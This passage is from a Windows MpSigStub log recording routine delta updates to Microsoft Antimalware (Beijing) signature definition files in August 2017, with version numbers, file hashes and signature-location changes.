  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.732.0                        
 AV delta VDM: 1.249.732.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.7.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.732.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\69DDD0D8-D5B5-44B7-A7EA-FF717B22E86911c0.1d30f9a776b9755
 1.249.732.0_to_1.249.757.0_mpasdlta.vdm._p: 3fdf0c3f12d78e67baf3ba62ca11515bb5aa1711a372d4a3ad6a47ebef21e391       
 1.249.732.0_to_1.249.757.0_mpavdlta.vdm._p: 77821d9bac584ca83a24d67fe1044ac13cf7ea68f9aa468b9b699f0b1c8f11e9       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.757.0
 AV delta VDM: 1.249.757.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.757.0
Patched mpavdlta.vdm to 1.249.757.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\69DDD0D8-D5B5-44B7-A7EA-FF717B22E86911c0.1d30f9a776b9755
 1.249.732.0_to_1.249.757.0_mpasdlta.vdm._p: 3fdf0c3f12d78e67baf3ba62ca11515bb5aa1711a372d4a3ad6a47ebef21e391       
 1.249.732.0_to_1.249.757.0_mpavdlta.vdm._p: 77821d9bac584ca83a24d67fe1044ac13cf7ea68f9aa468b9b699f0b1c8f11e9       
                               mpasdlta.vdm: dcc1cc89523efbd97a8c9620eac11229470d4b6585362c2206b0cd293d63317b          1.249.757.0
                               mpavdlta.vdm: e732011a88145d82b9c8cd08f01c915407774eef16f1d38eecaf0ffbb5e89857          1.249.757.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{345B1E5C-17A6-4A53-9DA0-6D9164506F94} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{1D68EA01-A12E-4BB4-A7FF-51FD9B2572AF}
Signatures updated from C:\Windows\Temp\69DDD0D8-D5B5-44B7-A7EA-FF717B22E86911c0.1d30f9a776b9755

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.732.0  1.249.757.0
 AV delta VDM: 1.249.732.0  1.249.757.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-07 16:30:47Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-09 02:26:26Z
Process: 46c.1d310b6e65f5bdb
Command: /stub 1.1.13850.0 /payload 1.249.831.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.757.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.757.0                        
 AV delta VDM: 1.249.757.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.7.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.757.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\80C16826-29D8-41A5-A0DA-873D7BEE0B3746c.1d310b6e65f5bdb
 1.249.757.0_to_1.249.831.0_mpasdlta.vdm._p: 22ea65027c206bea671155d0f0c3cb39b59772e966a9ee11f9bb52e0f9b2b68a      
 1.249.757.0_to_1.249.831.0_mpavdlta.vdm._p: 1fea230fb778818b6b7d79e1cafa550e0382bc11909cc7131393b5f509002b29      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.831.0
 AV delta VDM: 1.249.831.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.831.0
Patched mpavdlta.vdm to 1.249.831.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\80C16826-29D8-41A5-A0DA-873D7BEE0B3746c.1d310b6e65f5bdb
 1.249.757.0_to_1.249.831.0_mpasdlta.vdm._p: 22ea65027c206bea671155d0f0c3cb39b59772e966a9ee11f9bb52e0f9b2b68a      
 1.249.757.0_to_1.249.831.0_mpavdlta.vdm._p: 1fea230fb778818b6b7d79e1cafa550e0382bc11909cc7131393b5f509002b29      
                               mpasdlta.vdm: 5928bc49a7949e08bb42d2bfb22de4df1766e19ba87ad4fa99128ccb3b70fbf6         1.249.831.0
                               mpavdlta.vdm: 87b9add1c10c7f0e094744af63fc009766f8dc51c4e5704a30ebe4dbc8e06e52         1.249.831.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{1D68EA01-A12E-4BB4-A7FF-51FD9B2572AF} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C442E682-D26E-4514-A726-0AC5C54D8ADC}
Signatures updated from C:\Windows\Temp\80C16826-29D8-41A5-A0DA-873D7BEE0B3746c.1d310b6e65f5bdb

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.757.0  1.249.831.0
 AV delta VDM: 1.249.757.0  1.249.831.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-09 02:26:51Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-09 16:01:39Z
Process: 528.1d31128c8c7b61d
Command: /stub 1.1.13850.0 /payload 1.249.855.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.831.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.831.0                        
 AV delta VDM: 1.249.831.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.7.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.831.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\ED477DB1-70BC-4E27-8D7D-4AB50659CBF9528.1d31128c8c7b61d
 1.249.831.0_to_1.249.855.0_mpasdlta.vdm._p: d7ccb8bf2b0c0b5b38c138f0099b688e3daad422221d13f26ca6eb170a36e628      
 1.249.831.0_to_1.249.855.0_mpavdlta.vdm._p: a01576a6138cb81f4a10ef75ef205f466cc5e5caab34d3ef15637bbd89fa4979      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.855.0
 AV delta VDM: 1.249.855.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.855.0
Patched mpavdlta.vdm to 1.249.855.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\ED477DB1-70BC-4E27-8D7D-4AB50659CBF9528.1d31128c8c7b61d
 1.249.831.0_to_1.249.855.0_mpasdlta.vdm._p: d7ccb8bf2b0c0b5b38c138f0099b688e3daad422221d13f26ca6eb170a36e628      
 1.249.831.0_to_1.249.855.0_mpavdlta.vdm._p: a01576a6138cb81f4a10ef75ef205f466cc5e5caab34d3ef15637bbd89fa4979      
                               mpasdlta.vdm: 8f4bd906c9117094114cf6ea236889184d783df5625527a4f07972ea59bc3b3f         1.249.855.0
                               mpavdlta.vdm: 668a8910b69da0a8e07f8679262a5885fb6e0e1009feec4bdc0d14c436603cf6         1.249.855.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C442E682-D26E-4514-A726-0AC5C54D8ADC} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{66837AB6-338A-4E6C-99E5-CF3F11BB3CC5}
Signatures updated from C:\Windows\Temp\ED477DB1-70BC-4E27-8D7D-4AB50659CBF9528.1d31128c8c7b61d

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.831.0  1.249.855.0
 AV delta VDM: 1.249.831.0  1.249.855.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-09 16:02:11Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-10 16:09:34Z
Process: 9ac.1d311f30eb5f294
Command: /stub 1.1.13850.0 /payload 1.249.911.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.855.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.855.0                        
 AV delta VDM: 1.249.855.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.7.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.855.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\18028538-642A-4BEA-9520-C181029400869ac.1d311f30eb5f294
 1.249.855.0_to_1.249.911.0_mpasdlta.vdm._p: d0b6db21753db2c9112166194064b70a2bda5635647faabcff1f75669b02c09b      
 1.249.855.0_to_1.249.911.0_mpavdlta.vdm._p: db5883305c3aedc7f9725b6f0b5e1e786f6903ab261654e57b69b934c139807e      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.911.0
 AV delta VDM: 1.249.911.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.911.0
Patched mpavdlta.vdm to 1.249.911.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\18028538-642A-4BEA-9520-C181029400869ac.1d311f30eb5f294
 1.249.855.0_to_1.249.911.0_mpasdlta.vdm._p: d0b6db21753db2c9112166194064b70a2bda5635647faabcff1f75669b02c09b      
 1.249.855.0_to_1.249.911.0_mpavdlta.vdm._p: db5883305c3aedc7f9725b6f0b5e1e786f6903ab261654e57b69b934c139807e      
                               mpasdlta.vdm: 7e00f16ac4f6e8e63c2b1441fdafddeed07dff9f941087320337e81a80a832c3         1.249.911.0
                               mpavdlta.vdm: c7a958f5ae298c3e1f03bb5ee60d606cc4f4ccb74e8d37d6219991600f02c57e         1.249.911.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{66837AB6-338A-4E6C-99E5-CF3F11BB3CC5} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{E8C461AE-2D69-49E1-81CA-36E3FF47CA36}
Signatures updated from C:\Windows\Temp\18028538-642A-4BEA-9520-C181029400869ac.1d311f30eb5f294

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.855.0  1.249.911.0
 AV delta VDM: 1.249.855.0  1.249.911.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-10 16:12:26Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-11 15:15:06Z
Process: 101c.1d312b49d1c7685
Command: /stub 1.1.13850.0 /payload 1.249.951.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.911.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.911.0                        
 AV delta VDM: 1.249.911.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.7.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.911.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\43DB8239-0532-4C05-80E5-5C673CA8238B101c.1d312b49d1c7685
 1.249.911.0_to_1.249.951.0_mpasdlta.vdm._p: 447a685dc37a96442a15f947e90b34e70275c7bbd9394879fc7b1cb36dcef50d       
 1.249.911.0_to_1.249.951.0_mpavdlta.vdm._p: 92acef623db1baa44a2bc5f1de5191c1a13ec2e2e8d0aeed0c1b1907436123fc       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.951.0
 AV delta VDM: 1.249.951.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.951.0
Patched mpavdlta.vdm to 1.249.951.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\43DB8239-0532-4C05-80E5-5C673CA8238B101c.1d312b49d1c7685
 1.249.911.0_to_1.249.951.0_mpasdlta.vdm._p: 447a685dc37a96442a15f947e90b34e70275c7bbd9394879fc7b1cb36dcef50d       
 1.249.911.0_to_1.249.951.0_mpavdlta.vdm._p: 92acef623db1baa44a2bc5f1de5191c1a13ec2e2e8d0aeed0c1b1907436123fc       
                               mpasdlta.vdm: 88469b6a04fd1997d68a9f795fca57e26b4d27a8d3878488cc1e64998fb1cce0          1.249.951.0
                               mpavdlta.vdm: acbf5eef9b3b31f3540ee34b5838628464c09b070c7c3c8a33c10eb9998ecfb6          1.249.951.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{E8C461AE-2D69-49E1-81CA-36E3FF47CA36} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{5E5E682B-90F4-4E74-9E5F-B6BBF240CEA6}
Signatures updated from C:\Windows\Temp\43DB8239-0532-4C05-80E5-5C673CA8238B101c.1d312b49d1c7685

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.911.0  1.249.951.0
 AV delta VDM: 1.249.911.0  1.249.951.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-11 15:15:37Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-11 15:15:37Z
Process: 111c.1d312b4afbbbbe3
Command: /stub 1.1.13850.0 /payload 117.8.0.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\NIS_Delta_Patch.exe
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Windows Defender (Windows 7):  Microsoft Antimalware (Beijing):   
       Status: Disabled                                 Active                             
  ProductGUID: 925A3ACA-C353-458A-AC8D-A7E5EB378092     EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: Not found                                1.1.14003.0                        
  AS base VDM: Not found                                1.249.0.0                          
  AV base VDM: Not found                                1.249.0.0                          
 AS delta VDM: Not found                                1.249.951.0                        
 AV delta VDM: Not found                                1.249.951.0                        
   NIS engine:                                          2.1.13804.0                        
 NIS base VDM:                                          117.0.0.0                          
 NIS full VDM:                                          117.7.0.0                          
     Platform: 6.1.7601.18170                           4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\NIS_Delta_Patch.exe

=============================== PackageDiscovery ===============================

                                 Package files discovered:
                                                Directory: C:\Windows\Temp\7A97FD15-347A-4D17-9800-E8128BCC3221111c.1d312b4afbbbbe3
 117.0.0.0_to_117.8.0.0_NISfull.vdm_source_NISbase.vdm._p: 9253eee5765024e041541bbbbc6928644428176141fc3d8f6d22bd4819d0bbfd       
               NIS Delta: 
   NIS engine: Not included
 NIS base VDM: Not included
 NIS full VDM: 117.8.0.0  

=============================== PatchApplication ===============================

Patched nisfull.vdm to 117.8.0.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                            Package files:
                                                Directory: C:\Windows\Temp\7A97FD15-347A-4D17-9800-E8128BCC3221111c.1d312b4afbbbbe3
 117.0.0.0_to_117.8.0.0_NISfull.vdm_source_NISbase.vdm._p: 9253eee5765024e041541bbbbc6928644428176141fc3d8f6d22bd4819d0bbfd       
                                              nisfull.vdm: 7422ea8d8eb99a2d655883a63b31e6d9fd34bea6881db690b773bf8e2cca74f7          117.8.0.0
NISSignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B6DC2E23-C155-44AD-8932-D2F0C8E16645} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{8E09E53A-4E40-48D1-B9D3-8953090A325B}
Signatures updated from C:\Windows\Temp\7A97FD15-347A-4D17-9800-E8128BCC3221111c.1d312b4afbbbbe3

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the NIS Delta package.

               Original:  Updated to:
 NIS full VDM: 117.7.0.0  117.8.0.0 

NISDeltaUpdateFailure set to 0
End time: 2017-08-11 15:15:39Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-12 20:08:43Z
Process: 970.1d313a6cc2106a1
Command: /stub 1.1.13850.0 /payload 1.249.985.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.951.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.951.0                        
 AV delta VDM: 1.249.951.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.951.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\F0E64293-D04B-4D52-ADA9-ABD527945E8F970.1d313a6cc2106a1
 1.249.951.0_to_1.249.985.0_mpasdlta.vdm._p: 6dac526bf6ac1e976622adca59e7889a600dc8df2f5f632a4009e6fca2964000      
 1.249.951.0_to_1.249.985.0_mpavdlta.vdm._p: 226978b2cf6ff33a9add010e42dd6ec449c624ddee144d0f816e1e1a239a2998      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.985.0
 AV delta VDM: 1.249.985.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.985.0
Patched mpavdlta.vdm to 1.249.985.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\F0E64293-D04B-4D52-ADA9-ABD527945E8F970.1d313a6cc2106a1
 1.249.951.0_to_1.249.985.0_mpasdlta.vdm._p: 6dac526bf6ac1e976622adca59e7889a600dc8df2f5f632a4009e6fca2964000      
 1.249.951.0_to_1.249.985.0_mpavdlta.vdm._p: 226978b2cf6ff33a9add010e42dd6ec449c624ddee144d0f816e1e1a239a2998      
                               mpasdlta.vdm: 015a496a5368c5a72f0d67a4418b06d02ebe2eb61e97ffef29c9db5e833bb4fd         1.249.985.0
                               mpavdlta.vdm: fbc1992211aaff4a018f660df13ce2e8c3d1f05f8bd782e01e83f90c47adb576         1.249.985.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{5E5E682B-90F4-4E74-9E5F-B6BBF240CEA6} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{647C24E1-A139-4927-94E8-40AA6351C078}
Signatures updated from C:\Windows\Temp\F0E64293-D04B-4D52-ADA9-ABD527945E8F970.1d313a6cc2106a1

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.951.0  1.249.985.0
 AV delta VDM: 1.249.951.0  1.249.985.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-12 20:10:23Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-14 15:18:28Z
Process: c14.1d3151094dd6de0
Command: /stub 1.1.13850.0 /payload 1.249.1023.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.985.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.985.0                        
 AV delta VDM: 1.249.985.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.985.0.exe

=============================== PackageDiscovery ===============================

                    Package files discovered:
                                   Directory: C:\Windows\Temp\9C032EA1-1E75-468B-9229-5860BB2BD457c14.1d3151094dd6de0
 1.249.985.0_to_1.249.1023.0_mpasdlta.vdm._p: 66000adf285c30114d8b0059eb54b838730f0d0a0d513856df70acd9c8696dc4      
 1.249.985.0_to_1.249.1023.0_mpavdlta.vdm._p: 4b0a11f26f038ec5f49f281f5f1f79664f07ceb4100236c7739499854b49495b      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1023.0
 AV delta VDM: 1.249.1023.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1023.0
Patched mpavdlta.vdm to 1.249.1023.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                               Package files:
                                   Directory: C:\Windows\Temp\9C032EA1-1E75-468B-9229-5860BB2BD457c14.1d3151094dd6de0
 1.249.985.0_to_1.249.1023.0_mpasdlta.vdm._p: 66000adf285c30114d8b0059eb54b838730f0d0a0d513856df70acd9c8696dc4      
 1.249.985.0_to_1.249.1023.0_mpavdlta.vdm._p: 4b0a11f26f038ec5f49f281f5f1f79664f07ceb4100236c7739499854b49495b      
                                mpasdlta.vdm: 4c02e0b42fba010ce471a97b86442dbdec311fc0bfc78569e567e761409b8cd6         1.249.1023.0
                                mpavdlta.vdm: 22b901ebb1d778349df716d6cd8ba84808903fa5deb7c5a26ab56789cd882645         1.249.1023.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{647C24E1-A139-4927-94E8-40AA6351C078} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{3A4C1F65-C3CA-45DA-BD28-2282CF0C1D69}
Signatures updated from C:\Windows\Temp\9C032EA1-1E75-468B-9229-5860BB2BD457c14.1d3151094dd6de0

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.985.0  1.249.1023.0
 AV delta VDM: 1.249.985.0  1.249.1023.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-14 15:18:52Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-14 16:19:34Z
Process: 1004.1d315191dcf939a
Command: /stub 1.1.13850.0 /payload 1.249.1026.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1023.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1023.0                       
 AV delta VDM: 1.249.1023.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1023.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\C868C6DC-327B-490F-9036-1E9EC8586F581004.1d315191dcf939a
 1.249.1023.0_to_1.249.1026.0_mpasdlta.vdm._p: 97f606a2314883451fb614a955bc647bec8576a0571ecd28d9005e3c2491f24f       
 1.249.1023.0_to_1.249.1026.0_mpavdlta.vdm._p: cc195c3e92728ae9dd695c708d79108a631edfd22fb169b83f3fdeac0fbf746f       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1026.0
 AV delta VDM: 1.249.1026.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1026.0
Patched mpavdlta.vdm to 1.249.1026.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\C868C6DC-327B-490F-9036-1E9EC8586F581004.1d315191dcf939a
 1.249.1023.0_to_1.249.1026.0_mpasdlta.vdm._p: 97f606a2314883451fb614a955bc647bec8576a0571ecd28d9005e3c2491f24f       
 1.249.1023.0_to_1.249.1026.0_mpavdlta.vdm._p: cc195c3e92728ae9dd695c708d79108a631edfd22fb169b83f3fdeac0fbf746f       
                                 mpasdlta.vdm: 490f9dfcc347c94a7e08b508c64dd524d707ec68c5ee36525cd918e9082d54f2          1.249.1026.0
                                 mpavdlta.vdm: 792b9348545e1e9cfb0cb616ee374195cf24f02d02f9adeaa323317865da1812          1.249.1026.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{3A4C1F65-C3CA-45DA-BD28-2282CF0C1D69} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{112C76F6-371F-4C57-9EF3-6AD5264E5F3C}
Signatures updated from C:\Windows\Temp\C868C6DC-327B-490F-9036-1E9EC8586F581004.1d315191dcf939a

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1023.0  1.249.1026.0
 AV delta VDM: 1.249.1023.0  1.249.1026.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-14 16:19:57Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-15 16:50:31Z
Process: 958.1d315e69b47cf76
Command: /stub 1.1.13850.0 /payload 1.249.1076.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1026.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1026.0                       
 AV delta VDM: 1.249.1026.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1026.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\4ADCA1A7-5C97-4F48-8D10-816B26127B56958.1d315e69b47cf76
 1.249.1026.0_to_1.249.1076.0_mpasdlta.vdm._p: 54c0a343a211eb4663aa88c75e66a4af6f987bd76b8e955a2a033f6132e7b88f      
 1.249.1026.0_to_1.249.1076.0_mpavdlta.vdm._p: e06c1467d9498c60869250f22c164468b6b3aea7c2c3bccab12bc1223f5df884      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1076.0
 AV delta VDM: 1.249.1076.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1076.0
Patched mpavdlta.vdm to 1.249.1076.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
